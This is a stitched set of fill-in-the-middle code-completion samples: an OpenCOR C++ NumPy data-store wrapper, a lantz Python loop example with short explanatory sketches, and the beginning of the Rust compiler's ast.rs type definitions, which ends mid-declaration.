dataStoreVariable); } return res; } //============================================================================== PyObject * DataStorePythonWrapper::variables(DataStore *pDataStore) { // Return the variables in the given data store as a Python dictionary return dataStoreVariablesDict(pDataStore->variables()); } //============================================================================== PyObject * DataStorePythonWrapper::voi_and_variables(DataStore *pDataStore) { // Return the VOI and variables in the given data store as a Python // dictionary return dataStoreVariablesDict(pDataStore->voiAndVariables()); } //============================================================================== double DataStorePythonWrapper::value(DataStoreVariable *pDataStoreVariable, quint64 pPosition, int pRun) const { // Return the value of the given data store variable at the given position // and for the given run if ( (pDataStoreVariable != nullptr) && (pDataStoreVariable->array() != nullptr)) { return pDataStoreVariable->value(pPosition, pRun); } throw std::runtime_error(tr("The 'NoneType' object is not subscriptable.").toStdString()); } //============================================================================== PyObject * DataStorePythonWrapper::values(DataStoreVariable *pDataStoreVariable, int pRun) const { // Create and return a NumPy array for the given data store variable and run DataStoreArray *dataStoreArray = pDataStoreVariable->array(pRun); if ((pDataStoreVariable != nullptr) && (dataStoreArray != nullptr)) { auto numPyArray = new NumPyPythonWrapper(dataStoreArray, pDataStoreVariable->size()); return numPyArray->numPyArray(); } #include "pythonbegin.h" Py_RETURN_NONE; #include "pythonend.h" } //============================================================================== NumPyPythonWrapper::NumPyPythonWrapper(DataStoreArray *pDataStoreArray, quint64 pSize) : mArray(pDataStoreArray) { // Tell our array that we are holding it mArray->hold(); // Initialise ourselves std::array<npy_intp, 1> dims = { npy_intp((pSize > 0)?pSize:pDataStoreArray->size()) }; #include "pythonbegin.h" mNumPyArray = PyArray_SimpleNewFromData(1, dims.data(), NPY_DOUBLE, static_cast<void *>(mArray->data())); // NOLINT(cppcoreguidelines-pro-type-cstyle-cast) PyArray_SetBaseObject(reinterpret_cast<PyArrayObject *>(mNumPyArray), // NOLINT(cppcoreguidelines-pro-type-cstyle-cast) PythonQtSupport::wrapQObject(this)); #include "pythonend.h" } //============================================================================== NumPyPythonWrapper::~NumPyPythonWrapper() { // Tell our array that we are releasing it mArray->release(); } //============================================================================== PyObject * NumPyPythonWrapper::numPyArray() const { // Return our NumPy array return mNumPyArray; } //============================================================================== } // namespace DataStore } // namespace OpenCOR //============================================================================== // End of file //==============================================================================<|fim▁end|>
auto simulationDataUpdatedFunction = reinterpret_cast<DataStoreValuesDictObject *>(pValuesDict)->simulationDataUpdatedFunction;
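The C++ wrapper in the datastorepythonwrapper.cpp row hands NumPy a borrowed buffer and then installs a base object so the owner cannot be freed while the array is alive. The same ownership rule is visible from pure Python, where a view records its owner in .base (a sketch of the concept, not the OpenCOR API):

import numpy as np

owner = np.arange(5.0)   # owns the underlying buffer
view = owner[1:4]        # borrows the buffer without copying

# NumPy keeps the owner reachable through the view, playing the same role
# as PyArray_SetBaseObject does for the wrapped DataStoreArray above.
assert view.base is owner
view[0] = 42.0
print(owner)             # the write is visible through the owner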
<|file_name|>example1-simpleloop.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*- """ example1-simpleloop ~~~~~~~~~~~~~~~~~~~ This example shows how to use the loop block backend and frontend. :copyright: 2015 by Lantz Authors, see AUTHORS for more details. :license: BSD, see LICENSE for more details. """ # From lantz, you import a helper function. from lantz.ui.app import start_gui_app # and the loop block and its user interface from lantz.ui.blocks import Loop, LoopUi # the drivers you need (In this case just simulated dummy drivers). from lantz.drivers.examples.dummydrivers import DummyOsci # Drivers are instantiated in the usual way. osci = DummyOsci('COM2') # You create a function that will be called by the loop # It requires three parameters # counter - the iteration number # iterations - total number of iterations # overrun - a boolean indicating if the time required for the operation # is longer than the interval. def measure(counter, iterations, overrun): print(counter, iterations, overrun) data = osci.measure() print(data) <|fim▁hole|> # and assign the function to the body of the loop app.body = measure # Finally you start the program start_gui_app(app, LoopUi) # This contains a very complete GUI for a loop you can easily create a customized version!<|fim▁end|>
# You instantiate the loop
app = Loop()

# and assign the function to the body of the loop
app.body = measure

# Finally you start the program
start_gui_app(app, LoopUi)

# This contains a very complete GUI for the loop; you can easily create a customized version!<|fim▁end|>
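The loop body in the example above receives counter, iterations and overrun on every tick. A standalone sketch of driving such a body without the GUI (plain Python, no lantz required):

def body(counter, iterations, overrun):
    # Skip the work when the previous tick ran past its interval.
    if overrun:
        return
    print('tick', counter, 'of', iterations)

# Minimal driver standing in for the Loop block's scheduler.
for counter in range(3):
    body(counter, iterations=3, overrun=False)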
<|file_name|>ast.rs<|end_file_name|><|fim▁begin|>// Copyright 2012-2014 The Rust Project Developers. See the COPYRIGHT // file at the top-level directory of this distribution and at // http://rust-lang.org/COPYRIGHT. // // Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or // http://www.apache.org/licenses/LICENSE-2.0> or the MIT license // <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your // option. This file may not be copied, modified, or distributed // except according to those terms. // The Rust abstract syntax tree. pub use self::AsmDialect::*; pub use self::AttrStyle::*; pub use self::BindingMode::*; pub use self::BinOp_::*; pub use self::BlockCheckMode::*; pub use self::CaptureClause::*; pub use self::Decl_::*; pub use self::ExplicitSelf_::*; pub use self::Expr_::*; pub use self::FloatTy::*; pub use self::FunctionRetTy::*; pub use self::ForeignItem_::*; pub use self::ImplItem_::*; pub use self::InlinedItem::*; pub use self::IntTy::*; pub use self::Item_::*; pub use self::KleeneOp::*; pub use self::Lit_::*; pub use self::LitIntType::*; pub use self::LocalSource::*; pub use self::Mac_::*; pub use self::MacStmtStyle::*; pub use self::MetaItem_::*; pub use self::Mutability::*; pub use self::Pat_::*; pub use self::PathListItem_::*; pub use self::PatWildKind::*; pub use self::PrimTy::*; pub use self::Sign::*; pub use self::Stmt_::*; pub use self::StrStyle::*; pub use self::StructFieldKind::*; pub use self::TokenTree::*; pub use self::TraitItem_::*; pub use self::Ty_::*; pub use self::TyParamBound::*; pub use self::UintTy::*; pub use self::UnOp::*; pub use self::UnsafeSource::*; pub use self::VariantKind::*; pub use self::ViewPath_::*; pub use self::Visibility::*; pub use self::PathParameters::*; use codemap::{Span, Spanned, DUMMY_SP, ExpnId}; use abi::Abi; use ast_util; use ext::base; use ext::tt::macro_parser; use owned_slice::OwnedSlice; use parse::token::{InternedString, str_to_ident}; use parse::token; use parse::lexer; use print::pprust; use ptr::P; use std::cell::Cell; use std::fmt; use std::rc::Rc; use serialize::{Encodable, Decodable, Encoder, Decoder}; // FIXME #6993: in librustc, uses of "ident" should be replaced // by just "Name". /// An identifier contains a Name (index into the interner /// table) and a SyntaxContext to track renaming and /// macro expansion per Flatt et al., "Macros /// That Work Together" #[derive(Clone, Copy, Hash, PartialOrd, Eq, Ord)] pub struct Ident { pub name: Name, pub ctxt: SyntaxContext } impl Ident { /// Construct an identifier with the given name and an empty context: pub fn new(name: Name) -> Ident { Ident {name: name, ctxt: EMPTY_CTXT}} pub fn as_str<'a>(&'a self) -> &'a str { self.name.as_str() } } impl fmt::Debug for Ident { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}#{}", self.name, self.ctxt) } } impl fmt::Display for Ident { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { fmt::Display::fmt(&self.name, f) } } impl fmt::Debug for Name { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { let Name(nm) = *self; write!(f, "{:?}({})", token::get_name(*self), nm) } } impl fmt::Display for Name { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { fmt::Display::fmt(&token::get_name(*self), f) } } impl PartialEq for Ident { fn eq(&self, other: &Ident) -> bool { if self.ctxt == other.ctxt { self.name == other.name } else { // IF YOU SEE ONE OF THESE FAILS: it means that you're comparing // idents that have different contexts. 
You can't fix this without // knowing whether the comparison should be hygienic or non-hygienic. // if it should be non-hygienic (most things are), just compare the // 'name' fields of the idents. Or, even better, replace the idents // with Name's. // // On the other hand, if the comparison does need to be hygienic, // one example and its non-hygienic counterpart would be: // syntax::parse::token::Token::mtwt_eq // syntax::ext::tt::macro_parser::token_name_eq panic!("not allowed to compare these idents: {}, {}. \ Probably related to issue \\#6993", self, other); } } fn ne(&self, other: &Ident) -> bool { ! self.eq(other) } } /// A SyntaxContext represents a chain of macro-expandings /// and renamings. Each macro expansion corresponds to /// a fresh u32 // I'm representing this syntax context as an index into // a table, in order to work around a compiler bug // that's causing unreleased memory to cause core dumps // and also perhaps to save some work in destructor checks. // the special uint '0' will be used to indicate an empty // syntax context. // this uint is a reference to a table stored in thread-local // storage. pub type SyntaxContext = u32; pub const EMPTY_CTXT : SyntaxContext = 0; pub const ILLEGAL_CTXT : SyntaxContext = 1; /// A name is a part of an identifier, representing a string or gensym. It's /// the result of interning. #[derive(Eq, Ord, PartialEq, PartialOrd, Hash, RustcEncodable, RustcDecodable, Clone, Copy)] pub struct Name(pub u32); impl Name { pub fn as_str<'a>(&'a self) -> &'a str { unsafe { // FIXME #12938: can't use copy_lifetime since &str isn't a &T ::std::mem::transmute::<&str,&str>(&token::get_name(*self)) } } pub fn usize(&self) -> usize { let Name(nm) = *self; nm as usize } pub fn ident(&self) -> Ident { Ident { name: *self, ctxt: 0 } } } /// A mark represents a unique id associated with a macro expansion pub type Mrk = u32; impl Encodable for Ident { fn encode<S: Encoder>(&self, s: &mut S) -> Result<(), S::Error> { s.emit_str(&token::get_ident(*self)) } } impl Decodable for Ident { fn decode<D: Decoder>(d: &mut D) -> Result<Ident, D::Error> { Ok(str_to_ident(&try!(d.read_str())[..])) } } /// Function name (not all functions have names) pub type FnIdent = Option<Ident>; #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Copy)] pub struct Lifetime { pub id: NodeId, pub span: Span, pub name: Name } impl fmt::Debug for Lifetime { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "lifetime({}: {})", self.id, pprust::lifetime_to_string(self)) } } /// A lifetime definition, eg `'a: 'b+'c+'d` #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct LifetimeDef { pub lifetime: Lifetime, pub bounds: Vec<Lifetime> } /// A "Path" is essentially Rust's notion of a name; for instance: /// std::cmp::PartialEq . It's represented as a sequence of identifiers, /// along with a bunch of supporting information. #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash)] pub struct Path { pub span: Span, /// A `::foo` path, is relative to the crate root rather than current /// module (like paths in an import). pub global: bool, /// The segments in the path: the things separated by `::`. 
pub segments: Vec<PathSegment>, } impl fmt::Debug for Path { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "path({})", pprust::path_to_string(self)) } } impl fmt::Display for Path { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", pprust::path_to_string(self)) } } /// A segment of a path: an identifier, an optional lifetime, and a set of /// types. #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct PathSegment { /// The identifier portion of this path segment. pub identifier: Ident, /// Type/lifetime parameters attached to this path. They come in /// two flavors: `Path<A,B,C>` and `Path(A,B) -> C`. Note that /// this is more than just simple syntactic sugar; the use of /// parens affects the region binding rules, so we preserve the /// distinction. pub parameters: PathParameters, } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub enum PathParameters { /// The `<'a, A,B,C>` in `foo::bar::baz::<'a, A,B,C>`<|fim▁hole|> impl PathParameters { pub fn none() -> PathParameters { AngleBracketedParameters(AngleBracketedParameterData { lifetimes: Vec::new(), types: OwnedSlice::empty(), bindings: OwnedSlice::empty(), }) } pub fn is_empty(&self) -> bool { match *self { AngleBracketedParameters(ref data) => data.is_empty(), // Even if the user supplied no types, something like // `X()` is equivalent to `X<(),()>`. ParenthesizedParameters(..) => false, } } pub fn has_lifetimes(&self) -> bool { match *self { AngleBracketedParameters(ref data) => !data.lifetimes.is_empty(), ParenthesizedParameters(_) => false, } } pub fn has_types(&self) -> bool { match *self { AngleBracketedParameters(ref data) => !data.types.is_empty(), ParenthesizedParameters(..) => true, } } /// Returns the types that the user wrote. Note that these do not necessarily map to the type /// parameters in the parenthesized case. pub fn types(&self) -> Vec<&P<Ty>> { match *self { AngleBracketedParameters(ref data) => { data.types.iter().collect() } ParenthesizedParameters(ref data) => { data.inputs.iter() .chain(data.output.iter()) .collect() } } } pub fn lifetimes(&self) -> Vec<&Lifetime> { match *self { AngleBracketedParameters(ref data) => { data.lifetimes.iter().collect() } ParenthesizedParameters(_) => { Vec::new() } } } pub fn bindings(&self) -> Vec<&P<TypeBinding>> { match *self { AngleBracketedParameters(ref data) => { data.bindings.iter().collect() } ParenthesizedParameters(_) => { Vec::new() } } } } /// A path like `Foo<'a, T>` #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct AngleBracketedParameterData { /// The lifetime parameters for this path segment. pub lifetimes: Vec<Lifetime>, /// The type parameters for this path segment, if present. pub types: OwnedSlice<P<Ty>>, /// Bindings (equality constraints) on associated types, if present. /// E.g., `Foo<A=Bar>`. 
pub bindings: OwnedSlice<P<TypeBinding>>, } impl AngleBracketedParameterData { fn is_empty(&self) -> bool { self.lifetimes.is_empty() && self.types.is_empty() && self.bindings.is_empty() } } /// A path like `Foo(A,B) -> C` #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct ParenthesizedParameterData { /// Overall span pub span: Span, /// `(A,B)` pub inputs: Vec<P<Ty>>, /// `C` pub output: Option<P<Ty>>, } pub type CrateNum = u32; pub type NodeId = u32; #[derive(Clone, Eq, Ord, PartialOrd, PartialEq, RustcEncodable, RustcDecodable, Hash, Copy)] pub struct DefId { pub krate: CrateNum, pub node: NodeId, } fn default_def_id_debug(_: DefId, _: &mut fmt::Formatter) -> fmt::Result { Ok(()) } thread_local!(pub static DEF_ID_DEBUG: Cell<fn(DefId, &mut fmt::Formatter) -> fmt::Result> = Cell::new(default_def_id_debug)); impl fmt::Debug for DefId { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { try!(write!(f, "DefId {{ krate: {}, node: {} }}", self.krate, self.node)); DEF_ID_DEBUG.with(|def_id_debug| def_id_debug.get()(*self, f)) } } impl DefId { /// Read the node id, asserting that this def-id is krate-local. pub fn local_id(&self) -> NodeId { assert_eq!(self.krate, LOCAL_CRATE); self.node } } /// Item definitions in the currently-compiled crate would have the CrateNum /// LOCAL_CRATE in their DefId. pub const LOCAL_CRATE: CrateNum = 0; pub const CRATE_NODE_ID: NodeId = 0; /// When parsing and doing expansions, we initially give all AST nodes this AST /// node value. Then later, in the renumber pass, we renumber them to have /// small, positive ids. pub const DUMMY_NODE_ID: NodeId = !0; /// The AST represents all type param bounds as types. /// typeck::collect::compute_bounds matches these against /// the "special" built-in traits (see middle::lang_items) and /// detects Copy, Send and Sync. #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub enum TyParamBound { TraitTyParamBound(PolyTraitRef, TraitBoundModifier), RegionTyParamBound(Lifetime) } /// A modifier on a bound, currently this is only used for `?Sized`, where the /// modifier is `Maybe`. Negative bounds should also be handled here. #[derive(Copy, Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub enum TraitBoundModifier { None, Maybe, } pub type TyParamBounds = OwnedSlice<TyParamBound>; #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct TyParam { pub ident: Ident, pub id: NodeId, pub bounds: TyParamBounds, pub default: Option<P<Ty>>, pub span: Span } /// Represents lifetimes and type parameters attached to a declaration /// of a function, enum, trait, etc. 
#[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct Generics { pub lifetimes: Vec<LifetimeDef>, pub ty_params: OwnedSlice<TyParam>, pub where_clause: WhereClause, } impl Generics { pub fn is_lt_parameterized(&self) -> bool { !self.lifetimes.is_empty() } pub fn is_type_parameterized(&self) -> bool { !self.ty_params.is_empty() } pub fn is_parameterized(&self) -> bool { self.is_lt_parameterized() || self.is_type_parameterized() } } /// A `where` clause in a definition #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct WhereClause { pub id: NodeId, pub predicates: Vec<WherePredicate>, } /// A single predicate in a `where` clause #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub enum WherePredicate { /// A type binding, eg `for<'c> Foo: Send+Clone+'c` BoundPredicate(WhereBoundPredicate), /// A lifetime predicate, e.g. `'a: 'b+'c` RegionPredicate(WhereRegionPredicate), /// An equality predicate (unsupported) EqPredicate(WhereEqPredicate) } /// A type bound, eg `for<'c> Foo: Send+Clone+'c` #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct WhereBoundPredicate { pub span: Span, /// Any lifetimes from a `for` binding pub bound_lifetimes: Vec<LifetimeDef>, /// The type being bounded pub bounded_ty: P<Ty>, /// Trait and lifetime bounds (`Clone+Send+'static`) pub bounds: OwnedSlice<TyParamBound>, } /// A lifetime predicate, e.g. `'a: 'b+'c` #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct WhereRegionPredicate { pub span: Span, pub lifetime: Lifetime, pub bounds: Vec<Lifetime>, } /// An equality predicate (unsupported), e.g. `T=int` #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct WhereEqPredicate { pub id: NodeId, pub span: Span, pub path: Path, pub ty: P<Ty>, } /// The set of MetaItems that define the compilation environment of the crate, /// used to drive conditional compilation pub type CrateConfig = Vec<P<MetaItem>> ; #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct Crate { pub module: Mod, pub attrs: Vec<Attribute>, pub config: CrateConfig, pub span: Span, pub exported_macros: Vec<MacroDef>, } pub type MetaItem = Spanned<MetaItem_>; #[derive(Clone, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub enum MetaItem_ { MetaWord(InternedString), MetaList(InternedString, Vec<P<MetaItem>>), MetaNameValue(InternedString, Lit), } // can't be derived because the MetaList requires an unordered comparison impl PartialEq for MetaItem_ { fn eq(&self, other: &MetaItem_) -> bool { match *self { MetaWord(ref ns) => match *other { MetaWord(ref no) => (*ns) == (*no), _ => false }, MetaNameValue(ref ns, ref vs) => match *other { MetaNameValue(ref no, ref vo) => { (*ns) == (*no) && vs.node == vo.node } _ => false }, MetaList(ref ns, ref miss) => match *other { MetaList(ref no, ref miso) => { ns == no && miss.iter().all(|mi| miso.iter().any(|x| x.node == mi.node)) } _ => false } } } } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct Block { /// Statements in a block pub stmts: Vec<P<Stmt>>, /// An expression at the end of the block /// without a semicolon, if any pub expr: Option<P<Expr>>, pub id: NodeId, /// Distinguishes between `unsafe { ... }` and `{ ... 
}` pub rules: BlockCheckMode, pub span: Span, } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash)] pub struct Pat { pub id: NodeId, pub node: Pat_, pub span: Span, } impl fmt::Debug for Pat { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "pat({}: {})", self.id, pprust::pat_to_string(self)) } } /// A single field in a struct pattern /// /// Patterns like the fields of Foo `{ x, ref y, ref mut z }` /// are treated the same as `x: x, y: ref y, z: ref mut z`, /// except `is_shorthand` is true #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct FieldPat { /// The identifier for the field pub ident: Ident, /// The pattern the field is destructured to pub pat: P<Pat>, pub is_shorthand: bool, } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug, Copy)] pub enum BindingMode { BindByRef(Mutability), BindByValue(Mutability), } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug, Copy)] pub enum PatWildKind { /// Represents the wildcard pattern `_` PatWildSingle, /// Represents the wildcard pattern `..` PatWildMulti, } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub enum Pat_ { /// Represents a wildcard pattern (either `_` or `..`) PatWild(PatWildKind), /// A PatIdent may either be a new bound variable, /// or a nullary enum (in which case the third field /// is None). /// /// In the nullary enum case, the parser can't determine /// which it is. The resolver determines this, and /// records this pattern's NodeId in an auxiliary /// set (of "PatIdents that refer to nullary enums") PatIdent(BindingMode, SpannedIdent, Option<P<Pat>>), /// "None" means a * pattern where we don't bind the fields to names. PatEnum(Path, Option<Vec<P<Pat>>>), /// An associated const named using the qualified path `<T>::CONST` or /// `<T as Trait>::CONST`. Associated consts from inherent impls can be /// referred to as simply `T::CONST`, in which case they will end up as /// PatEnum, and the resolver will have to sort that out. PatQPath(QSelf, Path), /// Destructuring of a struct, e.g. `Foo {x, y, ..}` /// The `bool` is `true` in the presence of a `..` PatStruct(Path, Vec<Spanned<FieldPat>>, bool), /// A tuple pattern `(a, b)` PatTup(Vec<P<Pat>>), /// A `box` pattern PatBox(P<Pat>), /// A reference pattern, e.g. `&mut (a, b)` PatRegion(P<Pat>, Mutability), /// A literal PatLit(P<Expr>), /// A range pattern, e.g. 
`1...2` PatRange(P<Expr>, P<Expr>), /// [a, b, ..i, y, z] is represented as: /// PatVec(box [a, b], Some(i), box [y, z]) PatVec(Vec<P<Pat>>, Option<P<Pat>>, Vec<P<Pat>>), /// A macro pattern; pre-expansion PatMac(Mac), } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug, Copy)] pub enum Mutability { MutMutable, MutImmutable, } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug, Copy)] pub enum BinOp_ { /// The `+` operator (addition) BiAdd, /// The `-` operator (subtraction) BiSub, /// The `*` operator (multiplication) BiMul, /// The `/` operator (division) BiDiv, /// The `%` operator (modulus) BiRem, /// The `&&` operator (logical and) BiAnd, /// The `||` operator (logical or) BiOr, /// The `^` operator (bitwise xor) BiBitXor, /// The `&` operator (bitwise and) BiBitAnd, /// The `|` operator (bitwise or) BiBitOr, /// The `<<` operator (shift left) BiShl, /// The `>>` operator (shift right) BiShr, /// The `==` operator (equality) BiEq, /// The `<` operator (less than) BiLt, /// The `<=` operator (less than or equal to) BiLe, /// The `!=` operator (not equal to) BiNe, /// The `>=` operator (greater than or equal to) BiGe, /// The `>` operator (greater than) BiGt, } pub type BinOp = Spanned<BinOp_>; #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug, Copy)] pub enum UnOp { /// The `box` operator UnUniq, /// The `*` operator for dereferencing UnDeref, /// The `!` operator for logical inversion UnNot, /// The `-` operator for negation UnNeg } /// A statement pub type Stmt = Spanned<Stmt_>; impl fmt::Debug for Stmt { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "stmt({}: {})", ast_util::stmt_id(self), pprust::stmt_to_string(self)) } } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash)] pub enum Stmt_ { /// Could be an item or a local (let) binding: StmtDecl(P<Decl>, NodeId), /// Expr without trailing semi-colon (must have unit type): StmtExpr(P<Expr>, NodeId), /// Expr with trailing semi-colon (may have any type): StmtSemi(P<Expr>, NodeId), StmtMac(P<Mac>, MacStmtStyle), } #[derive(Clone, Copy, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub enum MacStmtStyle { /// The macro statement had a trailing semicolon, e.g. `foo! { ... };` /// `foo!(...);`, `foo![...];` MacStmtWithSemicolon, /// The macro statement had braces; e.g. foo! { ... } MacStmtWithBraces, /// The macro statement had parentheses or brackets and no semicolon; e.g. /// `foo!(...)`. All of these will end up being converted into macro /// expressions. MacStmtWithoutBraces, } /// Where a local declaration came from: either a true `let ... = /// ...;`, or one desugared from the pattern of a for loop. #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug, Copy)] pub enum LocalSource { LocalLet, LocalFor, } // FIXME (pending discussion of #1697, #2178...): local should really be // a refinement on pat. 
/// Local represents a `let` statement, e.g., `let <pat>:<ty> = <expr>;` #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct Local { pub pat: P<Pat>, pub ty: Option<P<Ty>>, /// Initializer expression to set the value, if any pub init: Option<P<Expr>>, pub id: NodeId, pub span: Span, pub source: LocalSource, } pub type Decl = Spanned<Decl_>; #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub enum Decl_ { /// A local (let) binding: DeclLocal(P<Local>), /// An item binding: DeclItem(P<Item>), } /// Represents one arm of a `match` #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct Arm { pub attrs: Vec<Attribute>, pub pats: Vec<P<Pat>>, pub guard: Option<P<Expr>>, pub body: P<Expr>, } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub struct Field { pub ident: SpannedIdent, pub expr: P<Expr>, pub span: Span, } pub type SpannedIdent = Spanned<Ident>; #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug, Copy)] pub enum BlockCheckMode { DefaultBlock, UnsafeBlock(UnsafeSource), } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug, Copy)] pub enum UnsafeSource { CompilerGenerated, UserProvided, } /// An expression #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash)] pub struct Expr { pub id: NodeId, pub node: Expr_, pub span: Span, } impl fmt::Debug for Expr { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "expr({}: {})", self.id, pprust::expr_to_string(self)) } } #[derive(Clone, PartialEq, Eq, RustcEncodable, RustcDecodable, Hash, Debug)] pub enum Expr_ { /// First expr is the place; second expr is the value. ExprBox(Option<P<Expr>>, P<Expr>), /// An array (`[a, b, c, d]`) ExprVec(Vec<P<Expr>>), /// A function call /// /// The first field resolves to the function itself, /// and the second field is the list of arguments ExprCall(P<Expr>, Vec<P<Expr>>), /// A method call (`x.foo::<Bar, Baz>(a, b, c, d)`) /// /// The `SpannedIdent` is the identifier for the method name. /// The vector of `Ty`s are the ascribed type parameters for the method /// (within the angle brackets). /// /// The first element of the vector of `Expr`s is the expression that evaluates /// to the object on which the method is being called (the receiver), /// and the remaining elements are the rest of the arguments. /// /// Thus, `x.foo::<Bar, Baz>(a, b, c, d)` is represented as /// `ExprMethodCall(foo, [Bar, Baz], [x, a, b, c, d])`. ExprMethodCall(SpannedIdent, Vec<P<Ty>>, Vec<P<Expr>>), /// A tuple (`(a, b, c, d)`) ExprTup(Vec<P<Expr>>), /// A binary operation (For example: `a + b`, `a * b`) ExprBinary(BinOp, P<Expr>, P<Expr>), /// A unary operation (For example: `!x`, `*x`) ExprUnary(UnOp, P<Expr>), /// A literal (For example: `1u8`, `"foo"`) ExprLit(P<Lit>), /// A cast (`foo as f64`) ExprCast(P<Expr>, P<Ty>), /// An `if` block, with an optional else block /// /// `if expr { block } else { expr }` ExprIf(P<Expr>, P<Block>, Option<P<Expr>>), /// An `if let` expression with an optional else block /// /// `if let pat = expr { block } else { expr }` /// /// This is desugared to a `match` expression. ExprIfLet(P<Pat>, P<Expr>, P<Block>, Option<P<Expr>>), // FIXME #6993: change to Option<Name> ... or not, if these are hygienic. /// A while loop, with an optional label /// /// `'label: while expr { block }` ExprWhile(P<Expr>, P<Block>, Option<Ident>), // FIXME #6993: change to Option<Name> ... 
or not, if these are hygienic. /// A while-let loop, with an optional label /// /// `'label: while let pat = expr { block }` /// /// This is desugared to a combination of `loop` and `match` expressions. ExprWhileLet(P<Pat>, P<Expr>, P<Block>, Option<Ident>), // FIXME #6993: change to Option<Name> ... or not, if these are hygienic. /// A for loop, with an optional label /// /// `'label: for pat in expr { block }` /// /// This is desugared to a combination of `loop` and `match` expressions. ExprForLoop(P<Pat>, P<Expr>, P<Block>, Option<Ident>), /// Conditionless loop (can be exited with break, continue, or return) /// /// `'label: loop { block }` // FIXME #6993: change to Option<Name> ... or not, if these are hygienic. ExprLoop(P<Block>, Option<Ident>), /// A `match` block, with a source that indicates whether or not it is /// the result of a desugaring, and if so, which kind. ExprMatch(P<Expr>, Vec<Arm>, MatchSource), /// A closure (for example, `move |a, b, c| {a + b + c}`) ExprClosure(CaptureClause, P<FnDecl>, P<Block>), /// A block (`{ ... }`) ExprBlock(P<Block>), /// An assignment (`a = foo()`) ExprAssign(P<Expr>, P<Expr>), /// An assignment with an operator /// /// For example, `a += 1`. ExprAssignOp(BinOp, P<Expr>, P<Expr>), /// Access of a named struct field (`obj.foo`) ExprField(P<Expr>, SpannedIdent), /// Access of an unnamed field of a struct or tuple-struct /// /// For example, `foo.0`. ExprTupField(P<Expr>, Spanned<usize>), /// An indexing operation (`foo[2]`) ExprIndex(P<Expr>, P<Expr>), /// A range (`1..2`, `1..`, or `..2`) ExprRange(Option<P<Expr>>, Option<P<Expr>>), /// Variable reference, possibly containing `::` and/or type /// parameters, e.g. foo::bar::<baz>. /// /// Optionally "qualified", /// e.g. `<Vec<T> as SomeTrait>::SomeType`. ExprPath(Option<QSelf>, Path), /// A referencing operation (`&a` or `&mut a`) ExprAddrOf(Mutability, P<Expr>), /// A `break`, with an optional label to break ExprBreak(Option<Ident>), /// A `continue`, with an optional label ExprAgain(Option<Ident>), /// A `return`, with an optional value to be returned ExprRet(Option<P<Expr>>), /// Output of the `asm!()` macro ExprInlineAsm(InlineAsm), /// A macro invocation; pre-expansion ExprMac(Mac), /// A struct literal expression. /// /// For example, `Foo {x: 1, y: 2}`, or /// `Foo {x: 1, .. base}`, where `base` is the `Option<Expr>`. ExprStruct(Path, Vec<Field>, Option<P<Expr>>), /// A vector literal constructed from one repeated element. /// /// For example, `[1u8; 